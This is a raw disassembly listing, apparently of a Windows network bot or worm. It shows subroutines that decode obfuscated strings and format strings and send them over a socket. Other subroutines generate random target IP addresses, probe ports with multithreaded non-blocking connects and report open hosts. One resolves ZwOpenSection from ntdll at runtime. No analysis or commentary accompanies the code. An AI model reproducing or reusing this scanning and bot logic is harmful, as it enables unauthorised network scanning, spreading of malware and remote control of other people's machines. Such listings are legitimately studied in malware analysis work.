call sub_41E4C1
test eax, eax
pop ecx
mov [ebp+var_4], offset dword_457CF8
jnz short loc_401CE0
mov [ebp+var_4], offset dword_457C40
loc_401CE0: ; CODE XREF: sub_401B6E+169�j
lea eax, [ebp+var_2B4]
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [ebp+var_2B4]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_454A30
lea eax, [ebp+var_1B4]
push [ebp+var_4]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSSSS ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429BBE
add esp, 60h
jmp loc_401DF1
; ---------------------------------------------------------------------------
loc_401D6B: ; CODE XREF: sub_401B6E+150�j
push ebx
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push ebx
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_4567A0
lea eax, [ebp+var_1B4]
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSS_0 ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429BBE
add esp, 6Ch
loc_401DF1: ; CODE XREF: sub_401B6E+1F8�j
lea eax, [ebp+var_1B4]
push edi
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1B4]
push eax
push [ebp+arg_C4]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_401E6D
push esi
call dword_437190 ; Sleep
cmp dword_456DA8, edi
jnz short loc_401E30
lea eax, [ebp+var_2B4]
push eax
jmp short loc_401E31
; ---------------------------------------------------------------------------
loc_401E30: ; CODE XREF: sub_401B6E+2B7�j
push ebx
loc_401E31: ; CODE XREF: sub_401B6E+2C0�j
push offset aS_6 ; "%s\r\n"
lea eax, [ebp+var_1B4]
push esi
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_1B4]
push edi
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1B4]
push eax
push [ebp+arg_C4]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401E71
loc_401E6D: ; CODE XREF: sub_401B6E+69�j
; sub_401B6E+C4�j ...
xor eax, eax
jmp short loc_401E99
; ---------------------------------------------------------------------------
loc_401E71: ; CODE XREF: sub_401B6E+2FD�j
push edi
lea eax, [ebp+var_6B4]
push 400h
push eax
push [ebp+arg_C4]
call dword_456F58 ; recv
push [ebp+arg_C4]
call dword_456FF0 ; closesocket
xor eax, eax
inc eax
loc_401E99: ; CODE XREF: sub_401B6E+301�j
pop edi
pop esi
pop ebx
leave
retn
sub_401B6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E9E proc near ; CODE XREF: .text:00401982�p
; sub_403B9B+1DB�p ...
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_43AB70
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset off_43AB68
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_454A54
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call dword_437184 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_429C0F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_429C0F
add esp, 10h
jmp short loc_401F3C
; ---------------------------------------------------------------------------
loc_401F31: ; CODE XREF: sub_401E9E+AF�j
push 7D0h
call dword_437190 ; Sleep
loc_401F3C: ; CODE XREF: sub_401E9E+91�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_456E34
test eax, eax
jnz short loc_401F31
pop edi
inc eax
pop esi
leave
retn
sub_401E9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F54 proc near ; CODE XREF: sub_40A9FE+6125�p
; sub_40A9FE+9A36�p
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_402044
push 10h
mov ebx, offset dword_454A20
push 0
push ebx
call sub_429760
push 10h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_429D10
mov esi, offset dword_43AB8C
lea eax, [ebp+var_20]
push esi
push eax
call sub_429C5E
add esp, 20h
mov [ebp+var_10], eax
test eax, eax
jz loc_402044
xor edi, edi
inc edi
loc_401FA4: ; CODE XREF: sub_401F54+6C�j
push esi
push 0
call sub_429C5E
xor edx, edx
pop ecx
cmp eax, edx
pop ecx
mov [ebp+edi*4+var_10], eax
jz loc_402044
inc edi
cmp edi, 4
jl short loc_401FA4
cmp [ebp+arg_8], 1
jnz short loc_401FEE
cmp [ebp+arg_4], edx
mov ecx, offset dword_43AB88
mov eax, offset dword_43A30C
mov esi, ecx
jnz short loc_401FEA
mov esi, eax
mov edx, eax
loc_401FDD: ; CODE XREF: sub_401F54+98�j
cmp [ebp+arg_4], 0
jz short loc_401FE5
mov eax, ecx
loc_401FE5: ; CODE XREF: sub_401F54+8D�j
push esi
push edx
push eax
jmp short loc_40202F
; ---------------------------------------------------------------------------
loc_401FEA: ; CODE XREF: sub_401F54+83�j
mov edx, ecx
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FEE: ; CODE XREF: sub_401F54+72�j
cmp [ebp+arg_8], 2
jnz short loc_402013
cmp [ebp+arg_4], edx
mov ecx, offset dword_43AB88
mov eax, offset dword_43A30C
mov edx, ecx
jnz short loc_402007
mov edx, eax
loc_402007: ; CODE XREF: sub_401F54+AF�j
cmp [ebp+arg_4], 0
jz short loc_40200F
mov eax, ecx
loc_40200F: ; CODE XREF: sub_401F54+B7�j
push edx
push eax
jmp short loc_40202C
; ---------------------------------------------------------------------------
loc_402013: ; CODE XREF: sub_401F54+9E�j
cmp [ebp+arg_8], 3
jnz short loc_402044
cmp [ebp+arg_4], edx
mov eax, offset dword_43AB88
jnz short loc_402028
mov eax, offset dword_43A30C
loc_402028: ; CODE XREF: sub_401F54+CD�j
push eax
push [ebp+var_8]
loc_40202C: ; CODE XREF: sub_401F54+BD�j
push [ebp+var_C]
loc_40202F: ; CODE XREF: sub_401F54+94�j
push [ebp+var_10]
push offset dword_43AB7C
push ebx
call sub_429B03
add esp, 18h
mov eax, ebx
jmp short loc_402046
; ---------------------------------------------------------------------------
loc_402044: ; CODE XREF: sub_401F54+D�j
; sub_401F54+47�j ...
xor eax, eax
loc_402046: ; CODE XREF: sub_401F54+EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40204B proc near ; CODE XREF: sub_40A9FE+5E3A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 8
call sub_423800
test eax, eax
pop ecx
jle short loc_402093
mov eax, [ebp+arg_C]
mov eax, dword_4540D8[eax*8]
push eax
call dword_456FDC ; inet_ntoa
cmp [ebp+arg_8], 0
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset dword_43AB9C
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40208C
call sub_41CE4A
loc_402087: ; CODE XREF: sub_40204B+46�j
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40208C: ; CODE XREF: sub_40204B+35�j
call sub_41CDD4
jmp short loc_402087
; ---------------------------------------------------------------------------
loc_402093: ; CODE XREF: sub_40204B+D�j
cmp [ebp+arg_8], 0
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push offset dword_43AB90
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_4020B0
call sub_41CE4A
jmp short loc_4020B5
; ---------------------------------------------------------------------------
loc_4020B0: ; CODE XREF: sub_40204B+5C�j
call sub_41CDD4
loc_4020B5: ; CODE XREF: sub_40204B+63�j
add esp, 10h
pop ebp
retn
sub_40204B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020BA proc near ; CODE XREF: sub_402459+58�p
var_C = dword ptr -0Ch
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_AC = dword ptr 0B4h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_AC]
push edi
cmp eax, 0FFFFFFFFh
jz loc_4021E1
shl eax, 6
xor edi, edi
cmp dword_43A384[eax], edi
jz loc_4021E1
push 0Ch
call sub_423800
test eax, eax
pop ecx
jnz loc_4021E1
cmp dword_457F68, edi
jnz short loc_402118
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
mov [esp+0Ch+var_C], 0F618h
push 9C4h
call sub_41E415
pop ecx
pop ecx
jmp short loc_40211F
; ---------------------------------------------------------------------------
loc_402118: ; CODE XREF: sub_4020BA+3B�j
movzx eax, word_44399A
loc_40211F: ; CODE XREF: sub_4020BA+5C�j
push esi
mov esi, offset dword_454774
push 104h
push esi
push edi
mov dword_454984, eax
mov dword_454980, edi
call dword_43717C ; GetModuleFileNameA
push 103h
push offset dword_4439A8
push offset dword_454878
call sub_429D10
lea eax, [ebp+arg_10]
push 7Fh
push eax
push offset dword_454988
mov dword_454A14, edi
call sub_429D10
push esi
mov eax, [ebp+arg_CC]
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
mov dword_454A18, eax
push dword_454984
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push offset aSSSISS_ ; "%s %s, %s: %i, %s: %s."
push 0Ch
call sub_4234A7
add esp, 38h
mov dword_45497C, eax
lea eax, [ebp+var_4]
push eax
push edi
push offset dword_454770
push offset sub_402CE9
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, dword_45497C
pop esi
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz short loc_4021E1
jmp short loc_4021D9
; ---------------------------------------------------------------------------
loc_4021D1: ; CODE XREF: sub_4020BA+125�j
push 32h
call dword_437190 ; Sleep
loc_4021D9: ; CODE XREF: sub_4020BA+115�j
cmp dword_454A14, edi
jz short loc_4021D1
loc_4021E1: ; CODE XREF: sub_4020BA+E�j
; sub_4020BA+1F�j ...
pop edi
leave
retn
sub_4020BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021E4 proc near ; CODE XREF: sub_402675:loc_4026DD�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4540D8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_429420
add esp, 0Ch
push [ebp+arg_0]
call dword_456E28 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_456F34 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_429420
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_4021E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40222C proc near ; CODE XREF: sub_402675+60�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
or edi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_4], edi
mov [ebp+var_10], edi
call sub_4293A0
cmp eax, 0Fh
pop ecx
jbe short loc_402257
xor eax, eax
jmp loc_4022E4
; ---------------------------------------------------------------------------
loc_402257: ; CODE XREF: sub_40222C+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_429E0E
add esp, 18h
cmp [ebp+var_C], edi
jnz short loc_40228C
call sub_429B9C
cdq
mov ecx, 0E1h
idiv ecx
mov [ebp+var_C], edx
loc_40228C: ; CODE XREF: sub_40222C+4E�j
cmp [ebp+var_8], edi
push esi
mov esi, 0FFh
jnz short loc_4022A4
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_8], edx
loc_4022A4: ; CODE XREF: sub_40222C+69�j
cmp [ebp+var_4], edi
jnz short loc_4022B6
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_4], edx
loc_4022B6: ; CODE XREF: sub_40222C+7B�j
mov edx, [ebp+var_10]
cmp edx, edi
jnz short loc_4022C5
call sub_429B9C
cdq
idiv esi
loc_4022C5: ; CODE XREF: sub_40222C+8F�j
shl edx, 8
add edx, [ebp+var_4]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
pop esi
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add eax, edx
mov dword_4540D8[ecx*8], eax
loc_4022E4: ; CODE XREF: sub_40222C+26�j
pop edi
leave
retn
sub_40222C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022E7 proc near ; CODE XREF: sub_402675+78�p
; sub_404525+B86�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push offset dword_457C40
push [ebp+arg_0]
call dword_456FDC ; inet_ntoa
mov esi, dword_437178
push eax
call esi ; dword_437178
test eax, eax
jz loc_4023B5
push offset dword_457CF8
push [ebp+arg_0]
call dword_456FDC ; inet_ntoa
push eax
call esi ; dword_437178
test eax, eax
jz loc_4023B5
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_456FD0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4023B5
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_456F38 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_456FF4 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456EBC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_456F1C ; select
push esi
mov edi, eax
call dword_456FF0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
jmp short loc_4023B7
; ---------------------------------------------------------------------------
loc_4023B5: ; CODE XREF: sub_4022E7+25�j
; sub_4022E7+3E�j ...
xor eax, eax
loc_4023B7: ; CODE XREF: sub_4022E7+CC�j
pop edi
pop esi
pop ebx
leave
retn
sub_4022E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023BC proc near ; CODE XREF: sub_41F0F5+12C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_456FD0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4023E5
xor eax, eax
jmp short loc_402454
; ---------------------------------------------------------------------------
loc_4023E5: ; CODE XREF: sub_4023BC+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_456F38 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_456FF4 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456EBC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_456F1C ; select
push esi
mov edi, eax
call dword_456FF0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_402454: ; CODE XREF: sub_4023BC+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4023BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402459 proc near ; DATA XREF: sub_40A9FE+62ED�o
; sub_40A9FE+9BB7�o
var_CC = byte ptr -0CCh
var_BC = byte ptr -0BCh
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_CC]
inc ebx
rep movsd
mov ecx, [ebp+var_4]
mov [eax+0C0h], ebx
lea eax, [ebp+var_CC]
mov [ebp+arg_0], ecx
push eax
call dword_456F7C ; inet_addr
push [ebp+var_4]
mov ecx, [ebp+var_30]
lea esi, [ebp+var_CC]
sub esp, 0CCh
mov dword_4540D8[ecx*8], eax
push 33h
pop ecx
mov edi, esp
rep movsd
call sub_4020BA
push 8
call sub_423800
add esp, 0D4h
cmp eax, ebx
jnz short loc_402544
mov esi, offset dword_45474C
push esi
call dword_437168 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_43716C ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_402544
cmp [ebp+var_1C], eax
mov edi, dword_437170
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov ebx, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_402519
cmp [ebp+var_18], eax
jnz short loc_40251F
call edi ; dword_437170
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
lea eax, [ebp+var_BC]
push ebx
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_402519: ; CODE XREF: sub_402459+9D�j
cmp [ebp+var_18], 0
jz short loc_40253B
loc_40251F: ; CODE XREF: sub_402459+A2�j
call edi ; dword_437170
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
lea eax, [ebp+var_BC]
push ebx
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_40253B: ; CODE XREF: sub_402459+C4�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_402544: ; CODE XREF: sub_402459+6C�j
; sub_402459+88�j
mov eax, [ebp+var_30]
cmp [ebp+var_24], ebx
mov edi, ebx
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov dword_4540DC[eax*8], ebx
mov ebx, dword_437190
jb short loc_4025D4
loc_402560: ; CODE XREF: sub_402459+179�j
push edi
lea eax, [ebp+var_CC]
push [ebp+var_30]
mov [ebp+var_28], edi
push [ebp+var_3C]
push eax
push esi
push offset aSSDThreadDSubT ; "%s %s:%d, Thread: %d, Sub-thread: %d."
push 8
call sub_4234A7
mov [ebp+var_2C], eax
imul eax, 2724h
mov ecx, [ebp+var_30]
add esp, 1Ch
mov dword_46D724[eax], ecx
xor eax, eax
push eax
lea ecx, [ebp+var_CC]
push eax
push ecx
push offset sub_402675
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_2C]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jz short loc_4025CA
jmp short loc_4025C4
; ---------------------------------------------------------------------------
loc_4025C0: ; CODE XREF: sub_402459+16F�j
push 1Eh
call ebx ; dword_437190
loc_4025C4: ; CODE XREF: sub_402459+165�j
cmp [ebp+var_8], 0
jz short loc_4025C0
loc_4025CA: ; CODE XREF: sub_402459+163�j
push 1Eh
call ebx ; dword_437190
inc edi
cmp edi, [ebp+var_24]
jbe short loc_402560
loc_4025D4: ; CODE XREF: sub_402459+105�j
xor edi, edi
cmp [ebp+var_34], edi
jz short loc_4025F0
mov eax, [ebp+var_34]
imul eax, 0EA60h
push eax
call ebx ; dword_437190
jmp short loc_4025FD
; ---------------------------------------------------------------------------
loc_4025E9: ; CODE XREF: sub_402459+1A2�j
push 7D0h
call ebx ; dword_437190
loc_4025F0: ; CODE XREF: sub_402459+180�j
mov eax, [ebp+var_30]
cmp dword_4540DC[eax*8], 1
jz short loc_4025E9
loc_4025FD: ; CODE XREF: sub_402459+18E�j
mov eax, [ebp+var_30]
cmp [ebp+var_1C], edi
mov eax, dword_4540D8[eax*8]
jnz short loc_40263C
cmp [ebp+var_14], edi
jz short loc_40263C
push [ebp+var_34]
push [ebp+var_3C]
push eax
call dword_456FDC ; inet_ntoa
push eax
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push esi
lea eax, [ebp+var_BC]
push offset aSSAtSDAfterDMi ; "%s %s at %s:%d after %d minute(s)."
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_40263C: ; CODE XREF: sub_402459+1B1�j
; sub_402459+1B6�j
mov eax, [ebp+var_30]
push 0BB8h
mov dword_4540DC[eax*8], edi
call ebx ; dword_437190
push 8
call sub_423800
cmp eax, 1
pop ecx
jnz short loc_402665
push offset dword_45474C
call dword_437168 ; RtlDeleteCriticalSection
loc_402665: ; CODE XREF: sub_402459+1FF�j
push [ebp+var_30]
call sub_423623
pop ecx
push edi
call dword_437174 ; ExitThread
sub_402459 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402675 proc near ; DATA XREF: sub_402459+145�o
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_104 = byte ptr -104h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D4 = byte ptr -0D4h
var_C4 = byte ptr -0C4h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 198h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 33h
mov esi, eax
pop ecx
lea edi, [ebp+var_D4]
rep movsd
mov ecx, [ebp+var_C]
mov esi, [ebp+var_34]
mov [ebp+var_4], ecx
mov dword ptr [eax+0C4h], 1
mov [ebp+var_8], esi
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
mov eax, esi
pop ecx
imul eax, 2724h
lea ebx, dword_46D724[eax]
jmp loc_402803
; ---------------------------------------------------------------------------
loc_4026C7: ; CODE XREF: sub_402675+198�j
cmp [ebp+var_18], 0
push eax
jz short loc_4026DD
lea eax, [ebp+var_D4]
push eax
call sub_40222C
pop ecx
jmp short loc_4026E2
; ---------------------------------------------------------------------------
loc_4026DD: ; CODE XREF: sub_402675+57�j
call sub_4021E4
loc_4026E2: ; CODE XREF: sub_402675+66�j
pop ecx
mov [ebp+arg_0], eax
push [ebp+var_40]
push [ebp+var_44]
push eax
call sub_4022E7
add esp, 0Ch
cmp eax, 1
jnz loc_4027F8
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_402755
mov edi, offset dword_45474C
push edi
call dword_4370CC ; RtlEnterCriticalSection
cmp [ebp+var_24], 0
jnz short loc_402749
push [ebp+var_44]
push [ebp+arg_0]
call dword_456FDC ; inet_ntoa
push eax
push offset aIde746o6B_ ; "Ide74/6o6/B."
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_C4]
push offset aSSSSDOpen_ ; "%s %s%s: %s:%d open."
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 20h
loc_402749: ; CODE XREF: sub_402675+9F�j
push edi
call dword_437164 ; RtlLeaveCriticalSection
jmp loc_4027F8
; ---------------------------------------------------------------------------
loc_402755: ; CODE XREF: sub_402675+8D�j
push [ebp+arg_0]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_198]
push eax
call sub_429B03
mov eax, [ebp+var_28]
shl eax, 6
add eax, offset aD1 ; "d1"
push eax
lea eax, [ebp+var_104]
push eax
call sub_429B03
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_188]
push eax
call sub_429B03
mov eax, [ebp+var_24]
sub esp, 0ACh
mov [ebp+var_E0], eax
mov eax, [ebp+var_1C]
mov [ebp+var_DC], eax
mov eax, [ebp+var_20]
mov [ebp+var_E4], eax
mov eax, [ebp+var_44]
push 31h
mov [ebp+var_F4], eax
mov eax, [ebp+var_28]
pop ecx
mov [ebp+var_F0], esi
lea esi, [ebp+var_198]
mov edi, esp
push [ebp+var_4]
mov [ebp+var_EC], eax
rep movsd
lea ecx, [ebp+var_C4]
shl eax, 6
push ecx
call off_43A37C[eax]
mov esi, [ebp+var_8]
add esp, 0CCh
loc_4027F8: ; CODE XREF: sub_402675+83�j
; sub_402675+DB�j
push 7D0h
call dword_437190 ; Sleep
loc_402803: ; CODE XREF: sub_402675+4D�j
mov eax, [ebx]
cmp dword_4540DC[eax*8], 0
jnz loc_4026C7
push esi
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
sub_402675 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402822 proc near ; CODE XREF: sub_402BD7+76�p
push offset aNtdll_dll ; "ntdll.dll"
call dword_437034 ; LoadLibraryA
test eax, eax
mov dword_454A3C, eax
jz short loc_40286E
push esi
mov esi, dword_437030
push offset aRtlinitunicode ; "RtlInitUnicodeString"
push eax
call esi ; dword_437030
push offset aZwopensection ; "ZwOpenSection"
mov dword_454A34, eax
push dword_454A3C
call esi ; dword_437030
cmp dword_454A34, 0
mov dword_454A38, eax
pop esi
jz short loc_40286E
test eax, eax
jz short loc_40286E
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40286E: ; CODE XREF: sub_402822+12�j
; sub_402822+42�j ...
xor eax, eax
retn
sub_402822 endp
; =============== S U B R O U T I N E =======================================
sub_402871 proc near ; CODE XREF: sub_402BD7+ED�p
; sub_402BD7:loc_402CDD�p
mov eax, dword_454A3C
test eax, eax
jz short loc_402881
push eax
call dword_437038 ; FreeLibrary
loc_402881: ; CODE XREF: sub_402871+7�j
and dword_454A3C, 0
retn
sub_402871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402889 proc near ; CODE XREF: sub_40292F+85�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push esi
lea eax, [ebp+var_8]
